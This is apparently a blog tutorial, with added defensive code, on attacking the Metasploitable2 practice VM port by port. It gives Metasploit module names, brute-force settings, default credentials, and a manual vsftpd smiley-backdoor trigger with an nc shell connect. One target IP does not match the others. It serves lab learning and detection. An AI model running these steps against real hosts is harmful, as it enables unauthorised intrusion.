In this article I will show you how to use the penetration-testing target machine Metasploitable2.

Metasploitable2 target machine introduction:

Metasploitable2 is a purpose-built Ubuntu virtual machine designed as a security tool for testing and demonstrating common vulnerability attacks. This build of the virtual machine is compatible with VMware. When the virtual machine has started, log in with the username msfadmin and the password msfadmin. It is well suited to newcomers learning network security.

Metasploitable2 target machine download:

Download link: Link: https://pan.baidu.com/s/1I1QDeitaZR7EuluY8-0j5Q

Extraction code: 6666

Metasploitable2 target machine installation:

After downloading, unzip the installation package and open the virtual machine in VMware.

Metasploitable2 target machine vulnerability details:

Attacking machine: Kali, IP 172.16.5.42. Target machine IP: 172.16.5.17
Vulnerability list (port / service or weakness):

21 / weak password
22 / weak password
23 / weak password
25 / -
53 / -
80 / php_cgi
111 / -
139 / smb
445 / tested
512 / rlogin
512 / rlogin
514 / rlogin
1099 / java_rmi_server
1524 / backdoor
2049 / NFS share vulnerability
2121 / -
3306 / empty password
3632 / distcc_exec
5432 / postgresql
5900 / VNC
6000 / -
6667 / unreal_ircd
6697 / unreal_ircd
8009 / -
8180 / tomcat
8787 / drb_remote_codeexec

First, let's look at port 21. The FTP service version is 2.3.4, which immediately suggests the "smiley face" backdoor; the Metasploit module exploits it with a script.

The backdoor can also be triggered manually. If a smiley face ":)" is appended to the username sent to the server, this version of the service opens a listening shell on port 6200. We can confirm it with telnet, or attack automatically with the exploit module in Metasploit.

ftp 172.16.5.17   (telnet can also be used to trigger the smiley face)

Username: enter any account name followed by the smiley, for example root:)

Password: enter anything; the backdoor is now listening on port 6200

nc connection: nc 172.16.5.17 6200
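From the defender's side, both backdoors described in this article (the smiley-face shell on port 6200 and the "ingreslock" shell on port 1524 covered later) show up as an unexpected listening socket on the host. The following is an added example, not code from the original article: it parses `ss -ltnp` output and flags listeners that are either a known backdoor port or missing from an allowlist. The `ss` output and the allowlist of expected ports are constructed assumptions for a lab host.

```python
"""Audit a host's listening sockets for the backdoor listeners described above.

Added example written for defenders; it is not code from the original article.
The `ss -ltnp` output below is constructed, and the allowlist of expected
ports is an assumption that must be tuned for each system.
"""
import re

# Ports the article describes as backdoor listeners: 6200 opens after the
# FTP 2.3.4 smiley-face trigger, 1524 is the "ingreslock" shell.
KNOWN_BACKDOOR_PORTS = {
    6200: "FTP 2.3.4 smiley-face backdoor shell",
    1524: "ingreslock backdoor shell",
}

# Constructed sample in the layout printed by `ss -ltnp` (column spacing
# varies between ss versions; the parser only relies on field order).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128           0.0.0.0:22          0.0.0.0:*      users:(("sshd",pid=611,fd=3))
LISTEN  0       32            0.0.0.0:21          0.0.0.0:*      users:(("ftpd",pid=598,fd=4))
LISTEN  0       1             0.0.0.0:6200        0.0.0.0:*      users:(("sh",pid=598,fd=5))
LISTEN  0       50            0.0.0.0:1524        0.0.0.0:*      users:(("sh",pid=702,fd=3))
LISTEN  0       128         127.0.0.1:3306        0.0.0.0:*      users:(("mysqld",pid=640,fd=10))
LISTEN  0       128              [::]:22             [::]:*      users:(("sshd",pid=611,fd=4))
"""

# Matches "LISTEN <recvq> <sendq> <addr>:<port> <peer>" with an optional process column.
LISTEN_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)


def parse_listeners(ss_output):
    """Return (address, port, process) for every LISTEN line in ss output."""
    listeners = []
    for line in ss_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            listeners.append((m.group("addr"), int(m.group("port")),
                              m.group("proc") or "?"))
    return listeners


def audit_listeners(listeners, allowlist):
    """Flag known backdoor ports (critical) and any listener outside the
    allowlist (review). Returns a list of finding dicts in input order."""
    findings = []
    for addr, port, proc in listeners:
        if port in KNOWN_BACKDOOR_PORTS:
            findings.append({"port": port, "process": proc, "address": addr,
                             "severity": "critical",
                             "reason": KNOWN_BACKDOOR_PORTS[port]})
        elif port not in allowlist:
            findings.append({"port": port, "process": proc, "address": addr,
                             "severity": "review",
                             "reason": "listener not in allowlist"})
    return findings


if __name__ == "__main__":
    # On a live host, replace SAMPLE_SS_OUTPUT with:
    # subprocess.run(["ss", "-ltnp"], capture_output=True, text=True).stdout
    expected_ports = {21, 22, 3306}          # assumption for this lab host
    for f in audit_listeners(parse_listeners(SAMPLE_SS_OUTPUT), expected_ports):
        print(f"[{f['severity']}] {f['address']}:{f['port']} ({f['process']}) - {f['reason']}")
```

Run it as root (so `ss -p` can show process names) from cron or a configuration-management check; a `sh` process owning a listening socket, as in the constructed 6200 and 1524 lines, is the signature worth alerting on even when the port number is unfamiliar.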

Port 22: brute force directly

search ssh_login                       (search for the module)

use auxiliary/scanner/ssh/ssh_login    (load the module)

set RHOSTS 172.16.5.198                (set the target address)

set USER_FILE /root/0.txt              (set the path to the username wordlist)

set PASS_FILE /root/0.txt              (set the path to the password wordlist)

set THREADS 100                        (set the number of threads to 100)

run                                    (start)
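A password-guessing run like the one above against sshd leaves a dense burst of "Failed password" lines in the auth log from one source address, often followed by an "Accepted password" once a weak credential such as msfadmin is hit. The following is an added detection example, not code from the original article: it parses constructed OpenSSH syslog lines and flags any source that reaches a failure threshold inside a sliding time window, marking the case where a success follows the burst. The threshold, window and sample log are assumptions.

```python
"""Detect SSH password brute-force bursts in sshd auth log lines.

Added example for defenders; not code from the original article. The log
lines are constructed in the standard OpenSSH syslog format, and the
threshold (5 failures within 60 seconds from one source) is an assumption.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_AUTH_LOG = """\
Mar  9 10:15:01 target sshd[2201]: Failed password for invalid user admin from 172.16.5.42 port 51001 ssh2
Mar  9 10:15:02 target sshd[2203]: Failed password for root from 172.16.5.42 port 51002 ssh2
Mar  9 10:15:02 target sshd[2205]: Failed password for msfadmin from 172.16.5.42 port 51003 ssh2
Mar  9 10:15:03 target sshd[2207]: Failed password for invalid user test from 172.16.5.42 port 51004 ssh2
Mar  9 10:15:03 target sshd[2209]: Failed password for invalid user guest from 172.16.5.42 port 51005 ssh2
Mar  9 10:15:04 target sshd[2211]: Accepted password for msfadmin from 172.16.5.42 port 51006 ssh2
Mar  9 10:20:30 target sshd[2300]: Failed password for alice from 10.0.0.7 port 40000 ssh2
Mar  9 10:25:10 target sshd[2301]: Failed password for alice from 10.0.0.7 port 40001 ssh2
"""

# syslog prefix "Mon DD HH:MM:SS host sshd[pid]: " followed by the sshd message
_PREFIX = r'^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]: '
FAILED_RE = re.compile(_PREFIX + r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+')
ACCEPT_RE = re.compile(_PREFIX + r'Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+')


def parse_ts(ts, year=2022):
    """Syslog timestamps carry no year, so one is assumed (constructed sample)."""
    return datetime.strptime(f"{year} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: details} for sources with `threshold` failed logins inside a
    sliding window of `window_seconds`. A later successful login from a flagged
    source is recorded as `success_after` with the account that was opened."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    users = defaultdict(set)      # ip -> usernames tried
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ip, ts = m.group("ip"), parse_ts(m.group("ts"))
            q = recent[ip]
            q.append(ts)
            users[ip].add(m.group("user"))
            while (ts - q[0]).total_seconds() > window_seconds:   # slide the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = {"failures": len(q), "users": sorted(users[ip]),
                               "first_seen": q[0], "success_after": False}
            continue
        m = ACCEPT_RE.match(line)
        if m and m.group("ip") in flagged:
            # success after a burst of failures: treat as a probable compromise
            flagged[m.group("ip")]["success_after"] = True
            flagged[m.group("ip")]["compromised_user"] = m.group("user")
    return flagged


if __name__ == "__main__":
    for ip, d in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        status = f"SUCCESS as {d['compromised_user']}" if d["success_after"] else "no success seen"
        print(f"{ip}: {d['failures']} failures, users tried {d['users']}, {status}")
```

The mitigations are the usual ones: set `PasswordAuthentication no` in sshd_config and use keys, or at least rate-limit with fail2ban and remove default accounts such as msfadmin; the detector above is the check that tells you whether those controls are actually holding.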

Port 23 (telnet):

Try brute force as usual; the username and password are both msfadmin.

Use telnet to log in.
Port 80: there are quite a lot of vulnerabilities here. Visiting the phpinfo.php page reveals a vulnerability from 2012.

The Server API runs in CGI mode, which is vulnerable to PHP-CGI argument injection.
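The argument injection works because of how a CGI server hands the query string to the interpreter: when the raw query contains no literal "=", RFC 3875 says it is split on "+" and URL-decoded into command-line arguments, so a query that decodes to something starting with "-" reaches php-cgi as an option. The following is an added detection example, not code from the original article: it reproduces that rule and scans constructed Apache access-log lines for requests that would be parsed this way. The log lines and the directive name in them are constructed.

```python
"""Flag requests whose query string would reach php-cgi as command-line options.

Added example for defenders; not code from the original article. Access-log
lines are constructed in Apache combined format; `example_directive` is a
placeholder, not a real PHP setting.
"""
import re
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
172.16.5.42 - - [09/Mar/2022:10:30:01 +0000] "GET /phpinfo.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.16.5.42 - - [09/Mar/2022:10:30:05 +0000] "GET /index.php?-d+example_directive%3d1 HTTP/1.1" 200 220 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Mar/2022:10:31:00 +0000] "GET /index.php?id=-5 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
172.16.5.42 - - [09/Mar/2022:10:31:30 +0000] "GET /index.php?%2Dh HTTP/1.1" 200 900 "-" "curl/7.68.0"
10.0.0.7 - - [09/Mar/2022:10:32:00 +0000] "GET /search.php?hello+world HTTP/1.1" 200 400 "-" "Mozilla/5.0"
"""

# client ip, two ignored fields, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def cgi_args_from_query(query):
    """Reproduce RFC 3875 section 4.4: a query string with no unencoded '='
    is split on '+' and URL-decoded into argv for the CGI program."""
    if query == "" or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]


def is_option_injection(target):
    """True if the request target's query would reach php-cgi as argv whose
    first element looks like an option flag."""
    _, _, query = target.partition("?")
    args = cgi_args_from_query(query)
    return bool(args) and args[0].startswith("-")


def scan_access_log(log_text):
    """Return (client ip, request target) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_option_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"possible php-cgi option injection from {ip}: {target}")
```

Note that `id=-5` is not flagged: the literal "=" means the server passes the query through the QUERY_STRING variable only, never as argv. The real fix is to stop exposing the interpreter through plain CGI (use mod_php or php-fpm) and run a patched PHP; the scanner is for finding probing in historical logs.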
Ports 139 and 445 both run the SMB service, which provides file sharing.

use auxiliary/scanner/smb/smb_enumshares

Using the module: use auxiliary/admin/smb/samba_symlink_traversal
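The symlink traversal module needs a writable share on a Samba server that follows symbolic links outside the share tree, which is what `wide links = yes` permits (old Samba 3.0.x releases defaulted to yes; later releases changed the default after this class of issue). The following is an added example, not code from the original article: a small smb.conf parser plus a check that reports shares exposed by that combination, run over a constructed weak configuration and its corrected form. The share names and the old-Samba default assumption are constructed.

```python
"""Check an smb.conf for writable shares on a server that follows wide links.

Added example for defenders; not code from the original article. Both
configurations below are constructed; `default_wide_links=True` models the
old Samba 3.0.x default and is an assumption to set per installed version.
"""

WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   wide links = yes
   unix extensions = yes

[tmp]
   comment = scratch share
   path = /tmp
   writable = yes
   guest ok = yes

[docs]
   path = /srv/docs
   read only = yes
"""

FIXED_SMB_CONF = WEAK_SMB_CONF.replace("wide links = yes", "wide links = no")


def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}. Keys are lower-cased
    with internal whitespace collapsed (smbd ignores it); comments stripped."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][" ".join(key.lower().split())] = value.strip()
    return conf


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def _writable(share):
    """Samba accepts 'writable'/'writeable' or the inverse 'read only' (default yes)."""
    for key in ("writable", "writeable"):
        if key in share:
            return _truthy(share[key])
    if "read only" in share:
        return not _truthy(share["read only"])
    return False


def audit_symlink_traversal(conf, default_wide_links=True):
    """Return share names that are writable while the server follows wide links."""
    g = conf.get("global", {})
    wide_links = _truthy(g["wide links"]) if "wide links" in g else default_wide_links
    if not wide_links:
        return []
    return [name for name, share in conf.items()
            if name != "global" and _writable(share)]


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SMB_CONF), ("fixed", FIXED_SMB_CONF)):
        print(label, "exposed shares:", audit_symlink_traversal(parse_smb_conf(text)))
```

Setting `wide links = no` closes the traversal path without touching the share permissions; the read-only `docs` share is never reported because a client cannot create the symlink there in the first place.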
Port 1099 runs Java RMI, which has a deserialization command-execution vulnerability; you can see that we get a shell.

Principle: the default configuration of the RMI registry and RMI activation service in Java RMI Server has a security flaw that can be exploited to cause command execution.

Module: use exploit/multi/misc/java_rmi_server

After setting the parameters and running the exploit, a session is created; then switch to that session.

Port 1524:
An ancient and surprising "ingreslock" backdoor exists on a small number of servers, listening on port 1524. It has frequently been used to compromise exposed servers over the past decade, and it is trivial to use.
Port 3306 is the default database port. Since remote connections are enabled, brute-force it directly; the root account has an empty password, so log in with that.

Module used: use auxiliary/scanner/mysql/mysql_login
Port 3632 runs the distccd service, which has a remote command execution vulnerability; run the exploit directly.

Module used: use exploit/unix/misc/distcc_exec

Port 5432: brute-force PostgreSQL.

Port 5900 runs the VNC service. VNC consists of two parts, the server and the client; we brute-force the server.

Module used for brute force: use auxiliary/scanner/vnc/vnc_login

Ports 6667 and 6697: IRC service. This version of the IRC daemon contains a backdoor; run the exploit and get a shell directly.

Module used: use exploit/unix/irc/unreal_ircd_3281_backdoor

Port 8180: Tomcat. Brute force yields the account and password tomcat / tomcat.
Port 8787 runs the DRb service, which has a remote code execution vulnerability.

Module used: use exploit/linux/misc/drb_remote_codeexec

Metasploitable2 target penetration summary:

That covers the main vulnerabilities. This target machine is well suited to beginners for practice. Some vulnerabilities were not tested, and some problems may not have been found. I hope everyone abides by the cybersecurity law while learning these techniques. Thanks to everyone who helped; I still have more to do, and thank you for your support!


Origin blog.csdn.net/Aluxian_/article/details/123355133